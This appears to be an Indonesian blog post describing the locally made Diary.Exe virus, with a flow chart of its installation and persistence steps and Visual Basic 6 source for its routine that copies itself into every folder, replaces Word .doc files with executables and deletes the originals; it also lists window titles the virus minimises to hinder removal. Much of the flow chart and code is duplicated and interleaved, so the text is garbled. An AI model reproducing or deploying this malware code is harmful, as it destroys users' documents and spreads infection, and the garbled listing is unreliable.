Diary.Exe adalah salah satu Virus (yang katanya cukup Berbahaya oleh Vaksin.com) buatan Vxer (pembuat Virus) lokal. Virus ini dibuat dengan menggunakan Bahasa Visual Basic 6.0. Virus Diary.Exe bekerja menggunakan algoritma (yang kurang-lebihnya)
sebagai berikut :
|START EXECUTION|
| Create File Diary Seorang Newbie.txt |
|di folder %userprofile%\Application Data|
|
|Periksa apakah folder %ProgramFiles%\Common Files\System ada?|
|
| Create File Diary Seorang Newbie.txt |
|di folder %userprofile%\Application Data|
|
|Periksa apakah folder %ProgramFiles%\Common Files\System ada?|
|
tidak ada
|------------------------------------------->|
ada |
|------------------------------------------->|
ada |
| |
| Create file Explorer.Exe di folder | |Create file di folder
| %ProgramFiles%\Common Files\System | %systemroot&\System32|
|<-------------------------------------------|
|Infeksi key-key di Registry, Hidden file, Disableregistrytools, Dll|
|
|Periksa apakah folder %Program Files%\InstallShield Installation Information ada?|
| Create file Explorer.Exe di folder | |Create file di folder
| %ProgramFiles%\Common Files\System | %systemroot&\System32|
|<-------------------------------------------|
|Infeksi key-key di Registry, Hidden file, Disableregistrytools, Dll|
|
|Periksa apakah folder %Program Files%\InstallShield Installation Information ada?|
| tidak ada
|--------------------------------------------->|
ada |
| |Create folder %Program Files%\InstallShield
| Installation Information|
| |
| |
|<---------------------------------------------|
|--------------------------------------------->|
ada |
| |Create folder %Program Files%\InstallShield
| Installation Information|
| |
| |
|<---------------------------------------------|
|Create file Rsvdb.Exe ke %Program Files%\InstallShield Installation Information|
|
|Create file RegsvcChk.Exe ke folder %SystemRoot%|
|
|Create file Spoolsw.Exe ke folder %userprofile%\Application Data|
|
|Execute Regsvcchk.Exe|
|
|Execute Spoolsw.Exe|
|
|Deteksi dan hapus Virus Kangen All Varian di Komputer|
|
|Deteksi dan Infeksi semua File MS-Word (*.Doc) di Komputer|
|
|END EXECUTION|
|
|Create file RegsvcChk.Exe ke folder %SystemRoot%|
|
|Create file Spoolsw.Exe ke folder %userprofile%\Application Data|
|
|Execute Regsvcchk.Exe|
|
|Execute Spoolsw.Exe|
|
|Deteksi dan hapus Virus Kangen All Varian di Komputer|
|
|Deteksi dan Infeksi semua File MS-Word (*.Doc) di Komputer|
|
|END EXECUTION|
Berikut source code cara virus menghapus file .doc:
Private Sub cek(path As String)
On Error Resume Next
If Right(path, 1) <> "\" Then
path = path + "\"
On Error Resume Next
If Right(path, 1) <> "\" Then
path = path + "\"
End If
Set fol = fso.getfolder(path)
Set fil = fol.Files
Set subfol = fol.subfolders
If fso.fileexists(path + "Diary.exe") = True Then
GoTo a
Else
Call copi("Diary.exe", path)
End If
a: For Each fil2 In fil
If fso.getextensionname(fil2.Name) = "doc" Or fso.getextensionname(fil2.Name) = "DOC"
Then
desk1 = Left(fil2.Name, Len(fil2.Name) - 4)
Call copi(desk1 + ".exe", path)
Kill fil2.path
End If
Next
For Each subfols In subfol
cek (subfols.path)
Next
End Sub
Set fol = fso.getfolder(path)
Set fil = fol.Files
Set subfol = fol.subfolders
If fso.fileexists(path + "Diary.exe") = True Then
GoTo a
Else
Call copi("Diary.exe", path)
End If
a: For Each fil2 In fil
If fso.getextensionname(fil2.Name) = "doc" Or fso.getextensionname(fil2.Name) = "DOC"
Then
desk1 = Left(fil2.Name, Len(fil2.Name) - 4)
Call copi(desk1 + ".exe", path)
Kill fil2.path
End If
Next
For Each subfols In subfol
cek (subfols.path)
Next
End Sub
Virus juga akan me-Minimize window-window yang mempunyai string "Registry Editor","Application Data", "WINDOWS", "WINNT", "Program Files", "Command Prompt, "DOS", "Task","Process", "System", "Hijack", dan "Kill". Source codenya ada juga tapi panjang gan hehehe
Subscribe to email feed
